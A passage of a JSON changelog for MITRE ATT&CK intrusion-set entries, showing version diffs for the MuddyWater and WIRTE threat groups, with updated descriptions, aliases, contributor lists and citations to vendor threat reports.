                            "url": "https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html"
                        },
                        {
                            "source_name": "Reaqta MuddyWater November 2017",
                            "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020.",
                            "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/"
                        },
                        {
                            "source_name": "FireEye MuddyWater Mar 2018",
                            "description": "Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.",
                            "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html"
                        },
                        {
                            "source_name": "Symantec MuddyWater Dec 2018",
                            "description": "Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.",
                            "url": "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group"
                        },
                        {
                            "source_name": "SymantecCarbonBlack_Seedworm_Mar2026",
                            "description": "Threat Hunter Team. (2026, March 5). Seedworm: Iranian APT on Networks of U.S. Bank, Airport, Software Company. Retrieved March 5, 2026.",
                            "url": "https://www.security.com/threat-intelligence/iran-cyber-threat-activity-us"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Daniyal Naeem, BT Security",
                        "Marco Pedrinazzi, @pedrinazziM",
                        "Ozer Sarilar, @ozersarilar, STM",
                        "Dragos Threat Intelligence"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "7.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 03:26:57.416000+00:00\", \"old_value\": \"2025-10-22 19:08:44.552000+00:00\"}, \"root['description']\": {\"new_value\": \"[MuddyWater](https://attack.mitre.org/groups/G0069) is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).(Citation: CYBERCOM Iranian Intel Cyber January 2022) Since at least 2017, [MuddyWater](https://attack.mitre.org/groups/G0069) has targeted a range of government and private organizations across sectors, including telecommunications, local government, finance, defense, and oil and natural gas organizations, in the Middle East (specifically the UAE and Saudi Arabia), Asia, Africa, Europe, and North America. [MuddyWater](https://attack.mitre.org/groups/G0069) has reused domains dating back to October 2025, and has a preference for NameCheap and Hosterdaddy Private Limited (AS136557). In late 2025 and early 2026, [MuddyWater](https://attack.mitre.org/groups/G0069) used commercial satellite internet (i.e., Starlink) for command and control (C2) communication. (Citation: FalconFeeds_Iran_Mar2026)(Citation: Huntio_IranInfra_Mar2026)(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022)(Citation: NaumaanProofpoint_GlobalClickFix_April2025)(Citation: ESET_MuddyWater_Dec2025)(Citation: SymantecCarbonBlack_Seedworm_Mar2026)   \", \"old_value\": \"[MuddyWater](https://attack.mitre.org/groups/G0069) is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).(Citation: CYBERCOM Iranian Intel Cyber January 2022) Since at least 2017, [MuddyWater](https://attack.mitre.org/groups/G0069) has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022)\"}, \"root['x_mitre_version']\": {\"new_value\": \"7.0\", \"old_value\": \"6.0\"}}, \"iterable_item_added\": {\"root['aliases'][8]\": \"MuddyKrill\", \"root['external_references'][1]\": {\"source_name\": \"Cloudflare 2026 Threat Report New Threat Actors March 2026\", \"description\": \" Cloudflare. (2026, March 3). Introducing the 2026 Cloudflare Threat Report. Retrieved April 18, 2026.\", \"url\": \"https://blog.cloudflare.com/2026-threat-report/\"}, \"root['external_references'][4]\": {\"source_name\": \"MuddyKrill\", \"description\": \"(Citation: Cloudflare 2026 Threat Report New Threat Actors March 2026)\"}, \"root['external_references'][14]\": {\"source_name\": \"ESET_MuddyWater_Dec2025\", \"description\": \"ESET Research. (2025, December 2). MuddyWater: Snakes by the riverbank. Retrieved February 17, 2026.\", \"url\": \"https://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\"}, \"root['external_references'][15]\": {\"source_name\": \"FalconFeeds_Iran_Mar2026\", \"description\": \"FalconFeeds.io. (2026, March 5). The Digital Redoubt: Iran\\u2019s National Information Network and the Asymmetry of Modern Cyber Conflict. Retrieved March 9, 2026.\", \"url\": \"https://falconfeeds.io/blogs/the-digital-redoubt-irans-national-information-network-cyber-conflict\"}, \"root['external_references'][17]\": {\"source_name\": \"Huntio_IranInfra_Mar2026\", \"description\": \"Hunt.io. (2026, March 4). Iranian APT Infrastructure in Focus:  Mapping State-Aligned Clusters During Geopolitical Escalation. Retrieved April 16, 2026.\", \"url\": \"https://hunt.io/blog/iranian-apt-infrastructure-state-aligned-clusters\"}, \"root['external_references'][23]\": {\"source_name\": \"NaumaanProofpoint_GlobalClickFix_April2025\", \"description\": \"Naumaan, S., et al. (2025, April 17). Around the World in 90 Days: State-Sponsored Actors Try ClickFix . Retrieved January 21, 2026.\", \"url\": \"https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix\"}, \"root['external_references'][28]\": {\"source_name\": \"SymantecCarbonBlack_Seedworm_Mar2026\", \"description\": \"Threat Hunter Team. (2026, March 5). Seedworm: Iranian APT on Networks of U.S. Bank, Airport, Software Company. Retrieved March 5, 2026.\", \"url\": \"https://www.security.com/threat-intelligence/iran-cyber-threat-activity-us\"}, \"root['x_mitre_contributors'][3]\": \"Dragos Threat Intelligence\"}}",
                    "previous_version": "6.0",
                    "version_change": "6.0 \u2192 7.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to44__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to44__0\"><a href=\"#difflib_chg_to44__top\">t</a></td><td class=\"diff_header\" id=\"from44_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">[MuddyWater](https://attack.mitre.org/groups/G0069)&nbsp;is&nbsp;a&nbsp;cyb</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to44__top\">t</a></td><td class=\"diff_header\" id=\"to44_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">[MuddyWater](https://attack.mitre.org/groups/G0069)&nbsp;is&nbsp;a&nbsp;cyb</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">er&nbsp;espionage&nbsp;group&nbsp;assessed&nbsp;to&nbsp;be&nbsp;a&nbsp;subordinate&nbsp;element&nbsp;with</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">er&nbsp;espionage&nbsp;group&nbsp;assessed&nbsp;to&nbsp;be&nbsp;a&nbsp;subordinate&nbsp;element&nbsp;with</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">in&nbsp;Iran's&nbsp;Ministry&nbsp;of&nbsp;Intelligence&nbsp;and&nbsp;Security&nbsp;(MOIS).(Cita</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">in&nbsp;Iran's&nbsp;Ministry&nbsp;of&nbsp;Intelligence&nbsp;and&nbsp;Security&nbsp;(MOIS).(Cita</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">tion:&nbsp;CYBERCOM&nbsp;Iranian&nbsp;Intel&nbsp;Cyber&nbsp;January&nbsp;2022)&nbsp;Since&nbsp;at&nbsp;le</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tion:&nbsp;CYBERCOM&nbsp;Iranian&nbsp;Intel&nbsp;Cyber&nbsp;January&nbsp;2022)&nbsp;Since&nbsp;at&nbsp;le</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ast&nbsp;2017,&nbsp;[MuddyWater](https://attack.mitre.org/groups/G0069</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ast&nbsp;2017,&nbsp;[MuddyWater](https://attack.mitre.org/groups/G0069</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">)&nbsp;has&nbsp;targeted&nbsp;a&nbsp;range&nbsp;of&nbsp;government&nbsp;and&nbsp;private&nbsp;organizatio</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">)&nbsp;has&nbsp;targeted&nbsp;a&nbsp;range&nbsp;of&nbsp;government&nbsp;and&nbsp;private&nbsp;organizatio</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ns&nbsp;across&nbsp;sectors,&nbsp;including&nbsp;telecommunications,&nbsp;local&nbsp;gover</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ns&nbsp;across&nbsp;sectors,&nbsp;including&nbsp;telecommunications,&nbsp;local&nbsp;gover</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nment,&nbsp;defense,&nbsp;and&nbsp;oil&nbsp;and&nbsp;natural&nbsp;gas&nbsp;organizations,&nbsp;in&nbsp;th</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nment,&nbsp;finance,&nbsp;defense,&nbsp;and&nbsp;oil&nbsp;and&nbsp;natural&nbsp;gas&nbsp;organizatio</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e&nbsp;Middle&nbsp;East,&nbsp;Asia,&nbsp;Africa,&nbsp;Europe,&nbsp;and&nbsp;North&nbsp;America.(Cita</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ns,&nbsp;in&nbsp;the&nbsp;Middle&nbsp;East&nbsp;(specifically&nbsp;the&nbsp;UAE&nbsp;and&nbsp;Saudi&nbsp;Arabi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">tion:&nbsp;Unit&nbsp;42&nbsp;MuddyWater&nbsp;Nov&nbsp;2017)(Citation:&nbsp;Symantec&nbsp;MuddyW</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">a),&nbsp;Asia,&nbsp;Africa,&nbsp;Europe,&nbsp;and&nbsp;North&nbsp;America.&nbsp;[MuddyWater](ht</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ater&nbsp;Dec&nbsp;2018)(Citation:&nbsp;ClearSky&nbsp;MuddyWater&nbsp;Nov&nbsp;2018)(Citat</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tps://attack.mitre.org/groups/G0069)&nbsp;has&nbsp;reused&nbsp;domains&nbsp;dati</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ion:&nbsp;ClearSky&nbsp;MuddyWater&nbsp;June&nbsp;2019)(Citation:&nbsp;Reaqta&nbsp;MuddyWa</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ng&nbsp;back&nbsp;to&nbsp;October&nbsp;2025,&nbsp;and&nbsp;has&nbsp;a&nbsp;preference&nbsp;for&nbsp;NameCheap&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ter&nbsp;November&nbsp;2017)(Citation:&nbsp;DHS&nbsp;CISA&nbsp;AA22-055A&nbsp;MuddyWater&nbsp;F</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">and&nbsp;Hosterdaddy&nbsp;Private&nbsp;Limited&nbsp;(AS136557).&nbsp;In&nbsp;late&nbsp;2025&nbsp;and</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ebruary&nbsp;2022)(Citation:&nbsp;Talos&nbsp;MuddyWater&nbsp;Jan&nbsp;2022)</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;early&nbsp;2026,&nbsp;[MuddyWater](https://attack.mitre.org/groups/G0</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">069)&nbsp;used&nbsp;commercial&nbsp;satellite&nbsp;internet&nbsp;(i.e.,&nbsp;Starlink)&nbsp;for</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;command&nbsp;and&nbsp;control&nbsp;(C2)&nbsp;communication.&nbsp;(Citation:&nbsp;FalconFe</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">eds_Iran_Mar2026)(Citation:&nbsp;Huntio_IranInfra_Mar2026)(Citati</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">on:&nbsp;Unit&nbsp;42&nbsp;MuddyWater&nbsp;Nov&nbsp;2017)(Citation:&nbsp;Symantec&nbsp;MuddyWat</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">er&nbsp;Dec&nbsp;2018)(Citation:&nbsp;ClearSky&nbsp;MuddyWater&nbsp;Nov&nbsp;2018)(Citatio</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">n:&nbsp;ClearSky&nbsp;MuddyWater&nbsp;June&nbsp;2019)(Citation:&nbsp;Reaqta&nbsp;MuddyWate</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r&nbsp;November&nbsp;2017)(Citation:&nbsp;DHS&nbsp;CISA&nbsp;AA22-055A&nbsp;MuddyWater&nbsp;Feb</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ruary&nbsp;2022)(Citation:&nbsp;Talos&nbsp;MuddyWater&nbsp;Jan&nbsp;2022)(Citation:&nbsp;N</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">aumaanProofpoint_GlobalClickFix_April2025)(Citation:&nbsp;ESET_Mu</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ddyWater_Dec2025)(Citation:&nbsp;SymantecCarbonBlack_Seedworm_Mar</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">2026)&nbsp;&nbsp;&nbsp;</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--f8cb7b36-62ef-4488-8a6d-a7033e3271c1",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-05-24 17:02:44.226000+00:00",
                    "modified": "2026-04-23 02:15:29.965000+00:00",
                    "name": "WIRTE",
                    "description": "[WIRTE](https://attack.mitre.org/groups/G0090) is a cyberespionage actor, believed to be a subgroup of the Hamas-affiliated Gaza Cybergang, that has been active since at least August 2018. [WIRTE](https://attack.mitre.org/groups/G0090) has targeted diplomatic, financial, military, legal, and technology organizations across the Middle East, North Africa, and in Europe to gather intelligence. [WIRTE](https://attack.mitre.org/groups/G0090) has remained persistently active despite the ongoing Israel-Hamas conflict and has expanded their operations to include wiper malware attacks against Israeli targets.(Citation: Lab52 WIRTE Apr 2019)(Citation: Kaspersky WIRTE November 2021)(Citation: Check Point Wirte NOV 2024)(Citation: Palo Alto Ashen Lepus DEC 2025)",
                    "aliases": [
                        "WIRTE",
                        "Ashen Lepus"
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G0090",
                            "external_id": "G0090"
                        },
                        {
                            "source_name": "WIRTE",
                            "description": "(Citation: Lab52 WIRTE Apr 2019)"
                        },
                        {
                            "source_name": "Ashen Lepus",
                            "description": "(Citation: Palo Alto Ashen Lepus DEC 2025)"
                        },
                        {
                            "source_name": "Check Point Wirte NOV 2024",
                            "description": "Check Point. (2024, November 12). Hamas-affiliated Threat Actor WIRTE Continues its Middle East Operations and Moves to Disruptive Activity. Retrieved April 20, 2026.",
                            "url": "https://research.checkpoint.com/2024/hamas-affiliated-threat-actor-expands-to-disruptive-activity/"
                        },
                        {
                            "source_name": "Lab52 WIRTE Apr 2019",
                            "description": "S2 Grupo. (2019, April 2). WIRTE Group attacking the Middle East. Retrieved May 24, 2019.",
                            "url": "https://lab52.io/blog/wirte-group-attacking-the-middle-east/"
                        },
                        {
                            "source_name": "Palo Alto Ashen Lepus DEC 2025",
                            "description": "Unit 42. (2025, December 11). Hamas-Affiliated Ashen Lepus Targets Middle Eastern Diplomatic Entities With New AshTag Malware Suite. Retrieved April 20, 2026.",
                            "url": "https://unit42.paloaltonetworks.com/hamas-affiliate-ashen-lepus-uses-new-malware-suite-ashtag/"
                        },
                        {
                            "source_name": "Kaspersky WIRTE November 2021",
                            "description": "Yamout, M. (2021, November 29). WIRTE\u2019s campaign in the Middle East \u2018living off the land\u2019 since at least 2019. Retrieved February 1, 2022.",
                            "url": "https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Lab52 by S2 Grupo"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 02:15:29.965000+00:00\", \"old_value\": \"2025-04-16 20:37:32.959000+00:00\"}, \"root['description']\": {\"new_value\": \"[WIRTE](https://attack.mitre.org/groups/G0090) is a cyberespionage actor, believed to be a subgroup of the Hamas-affiliated Gaza Cybergang, that has been active since at least August 2018. [WIRTE](https://attack.mitre.org/groups/G0090) has targeted diplomatic, financial, military, legal, and technology organizations across the Middle East, North Africa, and in Europe to gather intelligence. [WIRTE](https://attack.mitre.org/groups/G0090) has remained persistently active despite the ongoing Israel-Hamas conflict and has expanded their operations to include wiper malware attacks against Israeli targets.(Citation: Lab52 WIRTE Apr 2019)(Citation: Kaspersky WIRTE November 2021)(Citation: Check Point Wirte NOV 2024)(Citation: Palo Alto Ashen Lepus DEC 2025)\", \"old_value\": \"[WIRTE](https://attack.mitre.org/groups/G0090) is a threat group that has been active since at least August 2018. [WIRTE](https://attack.mitre.org/groups/G0090) has targeted government, diplomatic, financial, military, legal, and technology organizations in the Middle East and Europe.(Citation: Lab52 WIRTE Apr 2019)(Citation: Kaspersky WIRTE November 2021)\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['aliases'][1]\": \"Ashen Lepus\", \"root['external_references'][2]\": {\"source_name\": \"Ashen Lepus\", \"description\": \"(Citation: Palo Alto Ashen Lepus DEC 2025)\"}, \"root['external_references'][3]\": {\"source_name\": \"Check Point Wirte NOV 2024\", \"description\": \"Check Point. (2024, November 12). Hamas-affiliated Threat Actor WIRTE Continues its Middle East Operations and Moves to Disruptive Activity. Retrieved April 20, 2026.\", \"url\": \"https://research.checkpoint.com/2024/hamas-affiliated-threat-actor-expands-to-disruptive-activity/\"}, \"root['external_references'][5]\": {\"source_name\": \"Palo Alto Ashen Lepus DEC 2025\", \"description\": \"Unit 42. (2025, December 11). Hamas-Affiliated Ashen Lepus Targets Middle Eastern Diplomatic Entities With New AshTag Malware Suite. Retrieved April 20, 2026.\", \"url\": \"https://unit42.paloaltonetworks.com/hamas-affiliate-ashen-lepus-uses-new-malware-suite-ashtag/\"}, \"root['x_mitre_domains'][1]\": \"mobile-attack\"}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 3.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to45__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to45__0\"><a href=\"#difflib_chg_to45__top\">t</a></td><td class=\"diff_header\" id=\"from45_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">[WIRTE](https://attack.mitre.org/groups/G0090)&nbsp;is&nbsp;a&nbsp;threat&nbsp;g</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to45__top\">t</a></td><td class=\"diff_header\" id=\"to45_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">[WIRTE](https://attack.mitre.org/groups/G0090)&nbsp;is&nbsp;a&nbsp;cyberesp</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">roup&nbsp;that&nbsp;has&nbsp;been&nbsp;active&nbsp;since&nbsp;at&nbsp;least&nbsp;August&nbsp;2018.&nbsp;[WIRTE</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ionage&nbsp;actor,&nbsp;believed&nbsp;to&nbsp;be&nbsp;a&nbsp;subgroup&nbsp;of&nbsp;the&nbsp;Hamas-affilia</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">](https://attack.mitre.org/groups/G0090)&nbsp;has&nbsp;targeted&nbsp;govern</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ted&nbsp;Gaza&nbsp;Cybergang,&nbsp;that&nbsp;has&nbsp;been&nbsp;active&nbsp;since&nbsp;at&nbsp;least&nbsp;Augu</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ment,&nbsp;diplomatic,&nbsp;financial,&nbsp;military,&nbsp;legal,&nbsp;and&nbsp;technology</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">st&nbsp;2018.&nbsp;[WIRTE](https://attack.mitre.org/groups/G0090)&nbsp;has&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;organizations&nbsp;in&nbsp;the&nbsp;Middle&nbsp;East&nbsp;and&nbsp;Europe.(Citation:&nbsp;Lab5</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">targeted&nbsp;diplomatic,&nbsp;financial,&nbsp;military,&nbsp;legal,&nbsp;and&nbsp;technol</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">2&nbsp;WIRTE&nbsp;Apr&nbsp;2019)(Citation:&nbsp;Kaspersky&nbsp;WIRTE&nbsp;November&nbsp;2021)</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ogy&nbsp;organizations&nbsp;across&nbsp;the&nbsp;Middle&nbsp;East,&nbsp;North&nbsp;Africa,&nbsp;and&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">in&nbsp;Europe&nbsp;to&nbsp;gather&nbsp;intelligence.&nbsp;[WIRTE](https://attack.mit</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">re.org/groups/G0090)&nbsp;has&nbsp;remained&nbsp;persistently&nbsp;active&nbsp;despit</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">e&nbsp;the&nbsp;ongoing&nbsp;Israel-Hamas&nbsp;conflict&nbsp;and&nbsp;has&nbsp;expanded&nbsp;their&nbsp;o</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">perations&nbsp;to&nbsp;include&nbsp;wiper&nbsp;malware&nbsp;attacks&nbsp;against&nbsp;Israeli&nbsp;t</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span 